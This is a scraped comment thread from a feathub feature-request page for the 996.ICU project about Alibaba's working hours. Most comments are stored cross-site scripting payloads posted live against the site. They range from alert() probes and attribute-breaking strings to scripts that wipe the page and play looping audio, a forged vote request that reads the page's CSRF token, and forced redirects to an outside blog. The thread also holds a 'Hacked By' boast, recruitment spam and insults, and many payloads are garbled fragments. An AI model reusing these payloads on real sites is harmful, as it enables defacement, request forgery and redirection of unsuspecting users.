LinXueyuanStdio/996.ICU

阿里

yaozhewei asked for this feature 5 months ago — 56 comments

yaozhewei commented 5 months ago

img,svg,table{visibility: collapse;}window.onload=function(){var commentBodySet = document.getElementsByClassName("body");for(var i=1;i

jarrettyu commented 5 months ago

怎么没有评论

| lovywinsy commented 5 months ago

什么都不说,才是最好的 ^

JimmyVV commented 5 months ago

:)

| formalin14 commented 5 months ago

默默转发

| xxxwei commented 5 months ago

阿里太忙了,点个赞就走,没时间评论。

Jeffery-Song commented 5 months ago

不同部门不一样吧,之前实习所在部门一般995,周五晚上随意,平时晚上去锻炼什么的也都没问题

FEI17N commented 5 months ago

阿里2c部门是996

| netsman1030 commented 5 months ago

这个应该是个外包提上去的,阿里对外包是真的狠

| Tarry2012 commented 5 months ago

阿里既压榨还洗脑。

| ostopuro commented 5 months ago

| ostopuro commented 5 months ago

反996工作机会介绍群

xx19941215 commented 5 months ago

alert("老哥有xss漏洞哦 修复下")

z231485 commented 5 months ago

alert("我也来注入下试试")

imgss commented 5 months ago

alert("我也来注入下试试")

| wubocong commented 5 months ago

alert('hhh')

jvjs commented 5 months ago

alert("你们把我带坏了")

why66ccff commented 5 months ago

alert("你们别太过分了")

sunrui849 commented 5 months ago

alert("哈哈哈哈哈哈哈哈哈")

d9823 commented 5 months ago

alert("是这样玩的么?")

Lleksi commented 5 months ago

">alert("test")

Lleksi commented 5 months ago

alert("test")

d9823 commented 5 months ago

alert("试试")

d9823 commented 5 months ago

alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

JohnHuahuaZhan commented 5 months ago

一群傻逼在那里注入,提示有漏洞就行了,注入你妈呢

intrhuting commented 5 months ago

美国上市互联网企业,总部上海,硅谷、北京、深圳、广州、台北都有办公点,全球业务,飞速发展中,开发、运营、产品、销售、商务、设计职位都在招人,薪资丰厚,10点上班,6点多下班,一周5天,拒绝996,不进icu。想内推加v:sharehealthy

abc1310054026 commented 5 months ago

@xx19941215: alert("老哥有xss漏洞哦 修复下") @z231485 : alert("我也来注入下试试") @imgss : alert("我也来注入下试试") @wubocong: alert('hhh') @jvjs : alert("你们把我带坏了") @why66ccff: alert("你们别太过分了") @sunrui849: alert("哈哈哈哈哈哈哈哈哈") @Lleksi : alert("test") alert("test") @d9823 : alert("试试") alert("我一个Android开发者都学会了xss注入~~~~~ 这成本也太低了吧")

666sbX commented 5 months ago

Hacked By Helen收徒QQ925999918

ByMYX commented 5 months ago

alert("长的像个pig昂,还把自己的照片附上去 有病呀!")

ByMYX commented 5 months ago

@xx19941215:alert("长的像个pig昂,还把自己的照片附上去 有病呀!")

ByMYX commented 5 months ago

window.alert = function() { return false; }

ByMYX commented 5 months ago

<!-- window.alert = function(str){ return ; } alert("不能弹出警示框");//-->

sadtrain commented 5 months ago

就这素质还收徒,一个好好的项目被一小部分人玩坏了

sadtrain commented 5 months ago

var picTableBody = document.querySelector('body > div.container > div > div.col-md-9.col-sm-12 > div.comments > div:nth-child(28) > div.media-body > div > div') picTableBody.removeChild(picTableBody.firstChild)

JamesChenX commented 5 months ago

document.body.innerText = '';

let audio = new Audio('http://data.huiyi8.com/yinxiao/mp3/86945.mp3');
audio.loop = true;
audio.autoplay = true;
document.body.style.height = '1000px';
document.body.addEventListener("mousemove", function () {
    audio.play();
});

let image = new Image();
image.style.position='absolute';
image.left=0;
image.top=0;
image.style.width='100%';
image.style.height='100%';
image.src='http://img.mp.itc.cn/upload/20160528/516ff860030c4b5cbb2c63aa5ff13834_th.jpg';
document.body.append(audio,image);

console.log('希望你能换个心情,迎接未来美好的每一天!');

LinXueyuanStdio commented 5 months ago Admin

table{visibility: collapse;}

reinit commented 5 months ago

Please report XSS vulnerability

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1"); xmlReq.send();

reinit commented 5 months ago

Please report XSS vulnerability https://feathub.com/feathub/feathub/+65

var xmlReq = new XMLHttpRequest(); xmlReq.addEventListener("load", function() { alert("Please report XSS vulnerability at https://feathub.com/feathub/feathub/+65, or https://feathub.com/feathub/feathub/+66 if you love me."); }); xmlReq.open("POST", "https://feathub.com/feathub/feathub/+65/vote?vote[score]=1", true); xmlReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlReq.setRequestHeader("Cache-Control", "no-cache"); xmlReq.setRequestHeader("Referer", "https://feathub.com/feathub/feathub/+65"); xmlReq.send("method=patch&authenticitytoken=" + document.head.querySelector("[name~=csrf-token][content]").content);

xss67612 commented 5 months ago

document.body.innerText = '';

let audio = new Audio('http://dl.stream.qqmusic.qq.com/M5000036Tf0f03sL4n.mp3?vkey=A3EDA94F203BA3612F658DE4820E8AE6D58BA52F8D9F5789E40AFA1065D58F26E0A951C9BB8F482819C3185BE1AEB77356B11F154A90C52D&guid=5150825362&fromtag=1');
audio.loop = true;
audio.autoplay = true;
document.body.style.height = '1000px';
document.body.addEventListener("mousemove", function () {
    audio.play();
});

let image = new Image();
image.style.position='absolute';
image.left=0;
image.top=0;
image.style.width='100%';
image.style.height='100%';
image.src='https://timgsa.baidu.com/timg?image&quality=80&size=b9999_10000&sec=1553929917129&di=a8bae55a6a121071613d4f801322bd0f&imgtype=0&src=http%3A%2F%2Fs6.sinaimg.cn%2Fmw690%2F003xpBcszy6PCoJubOd35%26amp%3B690';
document.body.append(audio,image);

console.log('希望你能换个心情,迎接未来美好的每一天!');

superzmy commented 5 months ago

for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; }

<script> for(var x of document.getElementsByClassName("body")) { if (x.innerHTML.indexOf("script") >= 0) x.innerHTML = ""; } <script>

| doujinlong1 commented 5 months ago

"/>alert("学习xss注入")<!-

jarrettyu commented 5 months ago

注入是真的烦

| cmlanche commented 5 months ago

禁用js就好了啊

| cmlanche commented 5 months ago

阿里是加班最严重的公司

tancky commented 5 months ago

alert('友情提醒:看到此消息请禁用浏览器javascript功能');

| sueking commented 5 months ago

"/>alert('alibaba')<!--

Presley-Z commented 5 months ago

alert("双锅牛逼")

Presley-Z commented 5 months ago

confirm("双锅牛逼")

| zzxcvbnm19 commented 5 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

| zzxcvbnm19 commented 5 months ago

sadsa

| microhz commented 5 months ago

alert("博主赶紧把布丁打上,大家别起哄了!都是吃口技术饭!积极建立黑名单机制!")

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, location.href="https://blogs.kainy.cn/?from=feathubXSS2" how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

kainy commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。

guotao commented 4 months ago

]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/> If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。

guotao commented 4 months ago

If it were too difficult to allow as the folder under root, window.location.href='https://blogs.kainy.cn/?from=feathubXSS2'; setTimeout("javascript:location.href='hello.html'", 0); how about a new macro/variable that lets us do something like {Movie TitleThe:1} that will use the first letter of the title, or some other customization (and NOT require {Movie Title} as a mandatory field)。。  。 ]>([\s\S])<\/body>/)[1].replace(/<?script?>/g,'').replace(/<\/?script?>/g,'').replace(//g, '')}};xmlhttp.open('GET',window.location.href,true);xmlhttp.send() }, 0)"/>

Join the discussion!

Sign-in with GitHub to comment